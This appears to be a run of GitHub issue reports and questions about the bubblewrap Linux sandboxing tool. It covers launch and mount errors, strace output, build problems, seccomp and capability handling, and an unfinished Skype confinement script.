2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libdbus-glib-1.so.2.2.2
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libffi.so.6.0.2
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libfontconfig.so.1.8.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libfreetype.so.6.11.1
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libgdk-x11-2.0.so.0.2400.25
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libgdk_pixbuf-2.0.so.0.3100.1
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libgio-2.0.so.0.4200.1
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libgmodule-2.0.so.0.4200.1
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0.4200.1
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libgraphite2.so.3.0.1
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libgthread-2.0.so.0.4200.1
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libgtk-x11-2.0.so.0.2400.25
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libharfbuzz.so.0.935.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libpango-1.0.so.0.3600.8
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libpangocairo-1.0.so.0.3600.8
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libpangoft2-1.0.so.0.3600.8
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libpixman-1.so.0.32.6
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libthai.so.0.2.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libxcb-render.so.0.0.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libxcb-shm.so.0.0.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libxcb.so.1.1.0
2016/12/25 05:35:20 sandbox: fdArgs: [--dev /dev --tmpfs /tmp --setenv XDG_RUNTIME_DIR /run/user/1000 --dir /run/user/1000 --setenv HOME /home/amnesia --dir /home/amnesia --unshare-user --unshare-ipc --unshare-pid --unshare-net --unshare-uts --unshare-cgroup-try --hostname amnesia --proc /proc --chdir /home/amnesia/sandboxed-tor-browser/tor-browser/Browser --uid 1000 --gid 1000 --seccomp 10 --info-fd 11 --setenv DISPLAY :0 --dir /tmp/.X11-unix --bind /tmp/.X11-unix/X0 /tmp/.X11-unix/X0 --ro-bind /usr/share/themes/Adwaita/gtk-2.0 /usr/share/themes/Adwaita/gtk-2.0 --ro-bind /usr/share/icons/Adwaita /usr/share/icons/Adwaita --ro-bind /usr/share/icons/hicolor /usr/share/icons/hicolor --ro-bind /usr/share/mime /usr/share/mime --setenv GTK2_RC_FILES /home/amnesia/.gtkrc-2.0 --file 4 /home/amnesia/.gtkrc-2.0 --ro-bind /usr/share/libthai/thbrk.tri /usr/share/libthai/thbrk.tri --ro-bind /home/user/.local/share/sandboxed-tor-browser/tor-browser /home/amnesia/sandboxed-tor-browser/tor-browser --bind /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/TorBrowser/Data/Browser/profile.default /home/amnesia/sandboxed-tor-browser/tor-browser/Browser/TorBrowser/Data/Browser/profile.default --bind /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/Desktop /home/amnesia/sandboxed-tor-browser/tor-browser/Browser/Desktop --bind /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/Downloads /home/amnesia/sandboxed-tor-browser/tor-browser/Browser/Downloads --bind /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/TorBrowser/Data/Browser/Caches /home/amnesia/sandboxed-tor-browser/tor-browser/Browser/TorBrowser/Data/Browser/Caches --ro-bind /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/TorBrowser/Data/Browser/profile.default/preferences /home/amnesia/sandboxed-tor-browser/tor-browser/Browser/TorBrowser/Data/Browser/profile.default/preferences --ro-bind /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/TorBrowser/Data/Browser/profile.default/extensions /home/amnesia/sandboxed-tor-browser/tor-browser/Browser/TorBrowser/Data/Browser/profile.default/extensions --setenv LD_LIBRARY_PATH /home/amnesia/sandboxed-tor-browser/tor-browser/Browser/TorBrowser/Tor --setenv FONTCONFIG_PATH /home/amnesia/sandboxed-tor-browser/tor-browser/Browser/TorBrowser/Data/fontconfig --setenv FONTCONFIG_FILE fonts.conf --setenv ASAN_OPTIONS detect_leaks=0 --setenv NSS_DISABLE_HW_AES 1 --symlink /home/amnesia/sandboxed-tor-browser/tor-browser/Browser/Desktop /home/amnesia/Desktop --symlink /home/amnesia/sandboxed-tor-browser/tor-browser/Browser/Downloads /home/amnesia/Downloads --setenv TOR_SOCKS_PORT 9150 --setenv TOR_CONTROL_PORT 9151 --setenv TOR_SKIP_LAUNCH 1 --setenv TOR_NO_DISPLAY_NETWORK_SETTINGS 1 --setenv TOR_STUB_CONTROL_SOCKET /run/user/1000/control --setenv TOR_STUB_SOCKS_SOCKET /run/user/1000/socks --bind /run/user/1000/sandboxed-tor-browser/control /run/user/1000/control --bind /run/user/1000/sandboxed-tor-browser/socks /run/user/1000/socks --file 5 /home/amnesia/.tbb_stub.so --setenv LD_PRELOAD libasan.so.2:/home/amnesia/.tbb_stub.so --setenv LIBGL_ALWAYS_SOFTWARE 1 --ro-bind /usr/lib/x86_64-linux-gnu/gtk-2.0/2.10.0/engines/libadwaita.so /usr/lib/gtk-2.0/2.10.0/engines/libadwaita.so --ro-bind /usr/lib/x86_64-linux-gnu/gtk-2.0/2.10.0/engines/libpixmap.so /usr/lib/gtk-2.0/2.10.0/engines/libpixmap.so --ro-bind /usr/lib/x86_64-linux-gnu/gtk-2.0/2.10.0/printbackends/libprintbackend-file.so /usr/lib/gtk-2.0/2.10.0/printbackends/libprintbackend-file.so --setenv GTK_PATH /usr/lib/gtk-2.0 --ro-bind /usr/lib/x86_64-linux-gnu/gdk-pixbuf-2.0/2.10.0/loaders/libpixbufloader-png.so /usr/lib/gdk-pixbuf-2.0/2.10.0/loaders/libpixbufloader-png.so --file 6 /usr/lib/gdk-pixbuf-2.0/2.10.0/loaders.cache --setenv GDK_PIXBUF_MODULE_FILE /usr/lib/gdk-pixbuf-2.0/2.10.0/loaders.cache --ro-bind /lib/x86_64-linux-gnu/ld-2.19.so /lib/ld-linux-x86-64.so.2 --ro-bind /lib/x86_64-linux-gnu/libc-2.19.so /usr/lib/libc.so.6 --ro-bind /lib/x86_64-linux-gnu/libdbus-1.so.3.8.13 /usr/lib/libdbus-1.so.3 --ro-bind /lib/x86_64-linux-gnu/libdl-2.19.so /usr/lib/libdl.so.2 --ro-bind /lib/x86_64-linux-gnu/libexpat.so.1.6.0 /usr/lib/libexpat.so.1 --ro-bind /lib/x86_64-linux-gnu/libgcc_s.so.1 /usr/lib/libgcc_s.so.1 --ro-bind /lib/x86_64-linux-gnu/libglib-2.0.so.0.4200.1 /usr/lib/libglib-2.0.so.0 --ro-bind /lib/x86_64-linux-gnu/libm-2.19.so /usr/lib/libm.so.6 --ro-bind /lib/x86_64-linux-gnu/libpcre.so.3.13.1 /usr/lib/libpcre.so.3 --ro-bind /lib/x86_64-linux-gnu/libpng12.so.0.50.0 /usr/lib/libpng12.so.0 --ro-bind /lib/x86_64-linux-gnu/libpthread-2.19.so /usr/lib/libpthread.so.0 --ro-bind /lib/x86_64-linux-gnu/libresolv-2.19.so /usr/lib/libresolv.so.2 --ro-bind /lib/x86_64-linux-gnu/librt-2.19.so /usr/lib/librt.so.1 --ro-bind /lib/x86_64-linux-gnu/libselinux.so.1 /usr/lib/libselinux.so.1 --ro-bind /lib/x86_64-linux-gnu/libuuid.so.1.3.0 /usr/lib/libuuid.so.1 --ro-bind /lib/x86_64-linux-gnu/libz.so.1.2.8 /usr/lib/libz.so.1 --ro-bind /usr/lib/x86_64-linux-gnu/libICE.so.6.3.0 /usr/lib/libICE.so.6 --ro-bind /usr/lib/x86_64-linux-gnu/libSM.so.6.0.1 /usr/lib/libSM.so.6 --ro-bind /usr/lib/x86_64-linux-gnu/libX11.so.6.3.0 /usr/lib/libX11.so.6 --ro-bind /usr/lib/x86_64-linux-gnu/libXau.so.6.0.0 /usr/lib/libXau.so.6 --ro-bind /usr/lib/x86_64-linux-gnu/libXcomposite.so.1.0.0 /usr/lib/libXcomposite.so.1 --ro-bind /usr/lib/x86_64-linux-gnu/libXcursor.so.1.0.2 /usr/lib/libXcursor.so.1 --ro-bind /usr/lib/x86_64-linux-gnu/libXdamage.so.1.1.0 /usr/lib/libXdamage.so.1 --ro-bind /usr/lib/x86_64-linux-gnu/libXdmcp.so.6.0.0 /usr/lib/libXdmcp.so.6 --ro-bind /usr/lib/x86_64-linux-gnu/libXext.so.6.4.0 /usr/lib/libXext.so.6 --ro-bind /usr/lib/x86_64-linux-gnu/libXfixes.so.3.1.0 /usr/lib/libXfixes.so.3 --ro-bind /usr/lib/x86_64-linux-gnu/libXi.so.6.1.0 /usr/lib/libXi.so.6 --ro-bind /usr/lib/x86_64-linux-gnu/libXinerama.so.1.0.0 /usr/lib/libXinerama.so.1 --ro-bind /usr/lib/x86_64-linux-gnu/libXrandr.so.2.2.0 /usr/lib/libXrandr.so.2 --ro-bind /usr/lib/x86_64-linux-gnu/libXrender.so.1.3.0 /usr/lib/libXrender.so.1 --ro-bind /usr/lib/x86_64-linux-gnu/libXt.so.6.0.0 /usr/lib/libXt.so.6 --ro-bind /usr/lib/x86_64-linux-gnu/libasound.so.2.0.0 /usr/lib/libasound.so.2 --ro-bind /usr/lib/x86_64-linux-gnu/libatk-1.0.so.0.21409.1 /usr/lib/libatk-1.0.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libcairo.so.2.11400.0 /usr/lib/libcairo.so.2 --ro-bind /usr/lib/x86_64-linux-gnu/libdatrie.so.1.3.1 /usr/lib/libdatrie.so.1 --ro-bind /usr/lib/x86_64-linux-gnu/libdbus-glib-1.so.2.2.2 /usr/lib/libdbus-glib-1.so.2 --ro-bind /usr/lib/x86_64-linux-gnu/libffi.so.6.0.2 /usr/lib/libffi.so.6 --ro-bind /usr/lib/x86_64-linux-gnu/libfontconfig.so.1.8.0 /usr/lib/libfontconfig.so.1 --ro-bind /usr/lib/x86_64-linux-gnu/libfreetype.so.6.11.1 /usr/lib/libfreetype.so.6 --ro-bind /usr/lib/x86_64-linux-gnu/libgdk-x11-2.0.so.0.2400.25 /usr/lib/libgdk-x11-2.0.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libgdk_pixbuf-2.0.so.0.3100.1 /usr/lib/libgdk_pixbuf-2.0.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libgio-2.0.so.0.4200.1 /usr/lib/libgio-2.0.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libgmodule-2.0.so.0.4200.1 /usr/lib/libgmodule-2.0.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0.4200.1 /usr/lib/libgobject-2.0.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libgraphite2.so.3.0.1 /usr/lib/libgraphite2.so.3 --ro-bind /usr/lib/x86_64-linux-gnu/libgthread-2.0.so.0.4200.1 /usr/lib/libgthread-2.0.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libgtk-x11-2.0.so.0.2400.25 /usr/lib/libgtk-x11-2.0.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libharfbuzz.so.0.935.0 /usr/lib/libharfbuzz.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libpango-1.0.so.0.3600.8 /usr/lib/libpango-1.0.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libpangocairo-1.0.so.0.3600.8 /usr/lib/libpangocairo-1.0.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libpangoft2-1.0.so.0.3600.8 /usr/lib/libpangoft2-1.0.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libpixman-1.so.0.32.6 /usr/lib/libpixman-1.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libthai.so.0.2.0 /usr/lib/libthai.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libxcb-render.so.0.0.0 /usr/lib/libxcb-render.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libxcb-shm.so.0.0.0 /usr/lib/libxcb-shm.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libxcb.so.1.1.0 /usr/lib/libxcb.so.1 --symlink /lib /lib64 --symlink /usr/lib /usr/lib64 --setenv LD_LIBRARY_PATH /home/amnesia/sandboxed-tor-browser/tor-browser/Browser/TorBrowser/Tor:/usr/lib --file 7 /etc/passwd --file 8 /etc/group --file 9 /var/lib/dbus/machine-id --symlink /var/lib/dbus/machine-id /etc/machine-id]
2016/12/25 05:35:20 sandbox: bwrap pid is: 16202
2016/12/25 05:35:20 sandbox: child pid is: 16203
2016/12/25 05:35:20 launch: Complete.
2016/12/25 05:35:20 firefox: Can't mount proc on /newroot/proc
2016/12/25 05:35:20 firefox: : Operation not permitted
2016/12/25 05:35:20 fatal error in the user interface: waitid: no child processes
A simple test bwrap --ro-bind / / --proc /proc --dev /dev /bin/bash
worked for me.
Outside of Qubes, i.e. in a Non-Qubes Debian jessie (VirtualBox) VM sandboxed-tor-browser
works fine.
So I guess "something that Qubes does breaks bubblewrap". Could you help us please making this more specific?
I've been advised to:
- Rebuild bubblewrap with strategic debugging instrumentation added.
- Use ptrace/ltrace/gdb to figure out what's actually going on.
Do you know why this is happening? How to fix this? Want any debug output? If you like a rebuild how bubblewrap with debugging enabled, where do you find build instructions?
When using user namespaces to create a jail, I still have access to capabilities like CAP_SYS_ADMIN
I would like to be able to tell the wrapper to drop all capabilities without exceptions when run as a normal user.
Please note that user namespaces reset capabilities. Inside a user namespace all capabilities are available to the user by default
Is there a reason the the (seemingly) overlapping functionality of bubblewrap to the Google nsjails project?
We haven't yet done a release, I think we should.
Maybe let's use 0.1.0
implementing semver ?
I've been using YEAR.SERIAL
for ostree since I don't think semver applies as much to non-libraries, but bubblewrap is kind of a library.
Compilation fails on CentOS 7 at the xsltproc step:
sudo yum install git autoconf gcc make automake libcap-devel
git clone https://github.com/projectatomic/bubblewrap --depth 1
cd bubblewrap/
./autogen.sh
make
make all-am
make[1]: Entering directory `/home/me/bubblewrap'
xsltproc --nonet --stringparam man.output.quietly 1 --stringparam funcsynopsis.style ansi --stringparam man.th.extra1.suppress 1 --stringparam man.authors.section.enabled 0 --stringparam man.copyright.section.enabled 0 http://docbook.sourceforge.net/release/xsl/current/manpages/docbook.xsl bwrap.xml
I/O error : Attempt to load network entity http://docbook.sourceforge.net/release/xsl/current/manpages/docbook.xsl
warning: failed to load external entity "http://docbook.sourceforge.net/release/xsl/current/manpages/docbook.xsl"
cannot parse http://docbook.sourceforge.net/release/xsl/current/manpages/docbook.xsl
From my tests, you'd need at least:
CONFIG_NAMESPACES=y
CONFIG_UTS_NS=y
CONFIG_IPC_NS=y
CONFIG_USER_NS=y
CONFIG_PID_NS=y
CONFIG_NET_NS=y
CONFIG_DEVPTS_MULTIPLE_INSTANCES
enabled.CONFIG_OVERLAY_FS
for mountsSeparately, FUSE would needed for Flatpak.
A ./configure && make
fails to create bwrap.1
from bwrap.xml
using the 0.1.3 release tarball because bwrap.xml
is not included.
Workaround is to use ./configure --disable-man
or to copy the the file from git.
Is it necessary to have --tmpfs use mode=755? I'm running sshd in bwrap and would like to allow other users to log in and be able to write to /tmp.
Hello,
bwrap seems to no work on my system. I can bind the / to /, althought then I get read-only /dev
. If I add then --dev /dev
it does not work at all. Neither does bwrap --ro-bind / / sh
work.
# ./bwrap --bind / / sh
# echo foo >/dev/null
sh: can't create /dev/null: Permission denied
# ./bwrap --dev /dev --bind / / sh
Can't bind mount /oldroot/ on /newroot/: Invalid argument
Can't read from privileged_op_socket
# ./bwrap --ro-bind / / sh
Can't bind mount /oldroot/ on /newroot/: No such file or directory
Can't read from privileged_op_socket
and with strace
# strace ./bwrap --ro-bind / / sh
execve("./bwrap", ["./bwrap", "--ro-bind", "/", "/", "sh"], [/* 76 vars */]) = 0
brk(NULL) = 0x1e8b000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f8e14039000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=206103, ...}) = 0
mmap(NULL, 206103, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f8e14006000
close(3) = 0
open("/lib64/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\340\10\2\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=1689000, ...}) = 0
mmap(NULL, 3795488, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f8e13a79000
mprotect(0x7f8e13c0e000, 2097152, PROT_NONE) = 0
mmap(0x7f8e13e0e000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x195000) = 0x7f8e13e0e000
mmap(0x7f8e13e14000, 14880, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f8e13e14000
close(3) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f8e14005000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f8e14004000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f8e14003000
arch_prctl(ARCH_SET_FS, 0x7f8e14004700) = 0
mprotect(0x7f8e13e0e000, 16384, PROT_READ) = 0
mprotect(0x608000, 4096, PROT_READ) = 0
mprotect(0x7f8e1403a000, 4096, PROT_READ) = 0
munmap(0x7f8e14006000, 206103) = 0
capget({_LINUX_CAPABILITY_VERSION_3, 0}, {CAP_CHOWN|CAP_DAC_OVERRIDE|CAP_DAC_READ_SEARCH|CAP_FOWNER|CAP_FSETID|CAP_KILL|CAP_SETGID|CAP_SETUID|CAP_SETPCAP|CAP_LINUX_IMMUTABLE|CAP_NET_BIND_SERVICE|CAP_NET_BROADCAST|CAP_NET_ADMIN|CAP_NET_RAW|CAP_IPC_LOCK|CAP_IPC_OWNER|CAP_SYS_MODULE|CAP_SYS_RAWIO|CAP_SYS_CHROOT|CAP_SYS_PTRACE|CAP_SYS_PACCT|CAP_SYS_ADMIN|CAP_SYS_BOOT|CAP_SYS_NICE|CAP_SYS_RESOURCE|CAP_SYS_TIME|CAP_SYS_TTY_CONFIG|CAP_MKNOD|CAP_LEASE|CAP_AUDIT_WRITE|CAP_AUDIT_CONTROL|CAP_SETFCAP|CAP_MAC_OVERRIDE|CAP_MAC_ADMIN|CAP_SYSLOG|CAP_WAKE_ALARM|CAP_BLOCK_SUSPEND|CAP_AUDIT_READ, CAP_CHOWN|CAP_DAC_OVERRIDE|CAP_DAC_READ_SEARCH|CAP_FOWNER|CAP_FSETID|CAP_KILL|CAP_SETGID|CAP_SETUID|CAP_SETPCAP|CAP_LINUX_IMMUTABLE|CAP_NET_BIND_SERVICE|CAP_NET_BROADCAST|CAP_NET_ADMIN|CAP_NET_RAW|CAP_IPC_LOCK|CAP_IPC_OWNER|CAP_SYS_MODULE|CAP_SYS_RAWIO|CAP_SYS_CHROOT|CAP_SYS_PTRACE|CAP_SYS_PACCT|CAP_SYS_ADMIN|CAP_SYS_BOOT|CAP_SYS_NICE|CAP_SYS_RESOURCE|CAP_SYS_TIME|CAP_SYS_TTY_CONFIG|CAP_MKNOD|CAP_LEASE|CAP_AUDIT_WRITE|CAP_AUDIT_CONTROL|CAP_SETFCAP|CAP_MAC_OVERRIDE|CAP_MAC_ADMIN|CAP_SYSLOG|CAP_WAKE_ALARM|CAP_BLOCK_SUSPEND|CAP_AUDIT_READ, 0}) = 0
getuid() = 0
geteuid() = 0
capset({_LINUX_CAPABILITY_VERSION_3, 0}, {CAP_NET_ADMIN|CAP_SYS_CHROOT|CAP_SYS_ADMIN, CAP_NET_ADMIN|CAP_SYS_CHROOT|CAP_SYS_ADMIN, 0}) = 0
prctl(PR_SET_DUMPABLE, 1) = 0
prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) = 0
ioctl(1, TCGETS, {B38400 opost isig icanon echo ...}) = 0
ioctl(1, TCGETS, {B38400 opost isig icanon echo ...}) = 0
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 2), ...}) = 0
brk(NULL) = 0x1e8b000
brk(0x1ead000) = 0x1ead000
readlink("/proc/self/fd/1", "/dev/pts/2", 4095) = 10
stat("/dev/pts/2", {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 2), ...}) = 0
getuid() = 0
getgid() = 0
open("/proc", O_RDONLY|O_PATH) = 3
mkdir("/run/user/0/.bubblewrap", 0755) = -1 ENOENT (No such file or directory)
mkdir("/tmp/.bubblewrap-0", 0755) = -1 EEXIST (File exists)
rt_sigprocmask(SIG_BLOCK, [CHLD], NULL, 8) = 0
clone(child_stack=0, flags=CLONE_NEWNS|SIGCHLD) = 1945
capset({_LINUX_CAPABILITY_VERSION_3, 0}, {0, 0, 0}) = 0
openat(3, "self/fd", O_RDONLY|O_NOCTTY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC) = 4
fstat(4, {st_mode=S_IFDIR|0500, st_size=0, ...}) = 0
fcntl(4, F_GETFL) = 0x18800 (flags O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY)
fcntl(4, F_SETFD, FD_CLOEXEC) = 0
getdents(4, /* 7 entries */, 32768) = 168
close(3) = 0
getdents(4, /* 0 entries */, 32768) = 0
close(4) = 0
signalfd4(-1, [CHLD], 8, SFD_CLOEXEC|SFD_NONBLOCK) = 3
poll([{fd=3, events=POLLIN}], 1, -1Can't bind mount /oldroot/ on /newroot/: No such file or directory
Can't read from privileged_op_socket
) = 1 ([{fd=3, revents=POLLIN}])
read(3, "\21\0\0\0\0\0\0\0\1\0\0\0\231\7\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"..., 128) = 128
exit_group(1) = ?
+++ exited with 1 +++
I am running Gentoo system, with kernel 4.5.2, all but USER_NS enabled in kernel config. The /dev is tmpfs populated with busybox's mdev. No systemd either.
How do we leverage seccomp_export_bpf to generate rules? Is there a tool available? Does passing the compiled list to --seccomp
result in rules to be whitelisted or blacklisted?
If bwrap creates a new user namespace for the sandbox by default, why does the --unshare-user
option exist? To allow for custom UID/GID only?
The setsid()
change broke my code because I use a seccomp whitelist, which didn't include setsid
, and the seccomp filter gets installed prior to the call. To avoid problems like this in the future, the prctl call should be done as close to immediately prior to the execvp
as possible.
As it stands there's other calls that need to be placed in everyone's whitelist that don't need to be if the filter was installed last, which is unnecessary attack surface, though the benefits here are likely fairly minor since bubblewrap is done doing most of the exotic things by the time the filter is installed currently.
I spent quite some time on this before realising what was happening. The ordering of the mounts seem to matter, else you get an error that isn't completely obvious (well to me anyway).
A working example:
/usr/bin/bwrap --ro-bind /tmp/sandbox / --proc /proc [command]
Whereas with the mounts reversed:
/usr/bin/bwrap --proc /proc --ro-bind /tmp/sandbox / [command]
Can't bind mount /oldroot/tmp/sandbox on /newroot/: Invalid argument
Can't read from privileged_op_socket
Is this a bug or user fail to understand/read the docs? Either way, would still be nice to point this out to other users as an issue (with solution)
Sorry. Mistakenly created. Though I have related question - my debian chown is not working inside bwrap.
Running demos/bubblewrap-shell on bubblewrap 0.1.2 gets the following error
$ ./bubblewrap-shell.sh
execvp /bin/sh: No such file or directory
Not running a Fedora distro, in case that is an issue?
Distributor ID: Debian
Description: Debian GNU/Linux 8.4 (jessie)
Release: 8.4
Codename: jessie
I have been getting loads of related errors to the above while using bweap, but thought I would make sure some of the demos worked first
While testing https://bodhi.fedoraproject.org/updates/bubblewrap-0.1.4-5.fc25 on a F25 Vagrant box, I observed the following:
$ rpm -q bubblewrap
bubblewrap-0.1.4-5.fc25.x86_64
$ whoami
vagrant
$ bwrap --ro-bind / / bash
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
Despite the errors, the operation appeared successful.
There has been some interest in using flatpak for shipping services that listen on sockets. I think bubblewrap will need some support to make this work
When using mount() inside of bubblewrap, there is always the MS_MGC_VAL flag.
However:
Specifying MS_MGC_VAL was required in kernel versions prior to 2.4, but since Linux 2.4 is no longer required and is ignored if specified.
http://man7.org/linux/man-pages/man2/mount.2.html
Is there still a reason it is used?
Can we instead take a reference to a fd which has the pre-compiled BPF to load?
We could port xdg-app and linux-user-chroot to this, installing in e.g. /usr/libexec/xdg-app/bubblewrap
I run an application using bubblewrap that forks off a number of background processes. When closing the application, the background processes are not always cleaned up, so if I run lsns
, I will still see bwrap
running and the background processes as its children. To clean up the namespace, I have to send the KILL
signal to bwrap
.
Is it possible for bwrap
to automatically kill everything in the namespace when the foreground process terminates? Or is there a reason why that wouldn't be appropriate?
BTW, bubblewrap is awesome; thanks for writing it!
If I try to mount a encfs folder inside bwrap, I get the error:
fuse: device not found, try 'modprobe fuse' first
The fuse module is loaded, and encfs works fine when used outside of bwrap.
EDIT: I'm guessing this has something to do with encfs using fusermount
, which has the setuid bit.
We're going to need to implement what Docker has now where we do MCS isolation. See:
The ugly part here is that basically the daemon maintains a global state of MCS labels that have been allocated. Without a daemon, we'd need to use some well-known shared state file (/run/bubblewrap/selinux
?)
There's not much point to creating a new UTS namespace when the hostname/domainname are inherited, and CAP_SYS_ADMIN
is dropped before user code is executed, making it generally "hard" to change the values.
It would be nice (and straight forward) to have the capability to set the hostname/domainname in the sandboxed child namespace.
I would like to point out that identifiers like "__MOUNTS_H__
" and "__NETWORK_H__
" do not fit to the expected naming convention of the C++ language standard.
Would you like to adjust your selection for unique names?
While testing https://bodhi.fedoraproject.org/updates/bubblewrap-0.1.4-5.fc25 on a F25 Vagrant box, I observed the following (the /dev/null
issue is #125):
$ rpm -q bubblewrap
bubblewrap-0.1.4-5.fc25.x86_64
[vagrant@localhost ~]$ whoami
vagrant
[vagrant@localhost ~]$ bwrap --ro-bind / / bash
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
$ sudo jou<tab key pressed>
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: _upvars: `-a2': invalid number specifier
bash: /dev/null: Permission denied
bash: _upvars: `-a0': invalid number specifier
I'm admittedly just mashing keys and probably not using bwrap
as intended, but figured I would file this anyways.
Basically I built on RHEL7.2, tried to run the demo, but needed:
diff --git a/demos/bubblewrap-shell.sh b/demos/bubblewrap-shell.sh
index da06d49..a445660 100755
--- a/demos/bubblewrap-shell.sh
+++ b/demos/bubblewrap-shell.sh
@@ -5,6 +5,7 @@ set -euo pipefail
--dir /tmp \
--proc /proc \
--dev /dev \
+ --share-user \
--ro-bind /etc/resolv.conf /etc/resolv.conf \
--symlink usr/lib /lib \
--symlink usr/lib64 /lib64 \
I'm leaning a bit towards making --share-user
the default, and you always have to say --unshare-user
if you want that ?
Maybe we have a --unshare-user-if-possible
? Dunno.
If we don't have a DWIM in bwrap, the ergonomics are going to be annoying for consuming tools that want to support both modes.
There has just been a local root exploit on firejail using a race condition
netblue30/firejail#1020
I have not yet been able to reproduce this with bubblewrap but I have the feeling simular issues could affect bubblewrap as well.
Comparing how the two programms do things, it there any major difference that rules these kind of issues on bubblewrap?
This command fails:
$ bwrap --unshare-pid --ro-bind / / --dev /dev sh
Can't mount devpts on /newroot/dev/pts: Invalid argument
While this works:
$ bwrap --unshare-pid --ro-bind / / --dev /dev --proc /proc sh
sh-4.3$
No idea why...
Just an idea, but people might find it interesting to use bwrap instead of firejail. Here is a quick example to contain Skype and even use Xephyr instead of the current X session.
#!/bin/sh
Xephyr :9 -screen 600x700 -reset -terminate -host-cursor -ac 2> /dev/null &
sleep 3
DISPLAY=:9 metacity 2> /dev/null &
mkdir /tmp/skypepulseclientconf
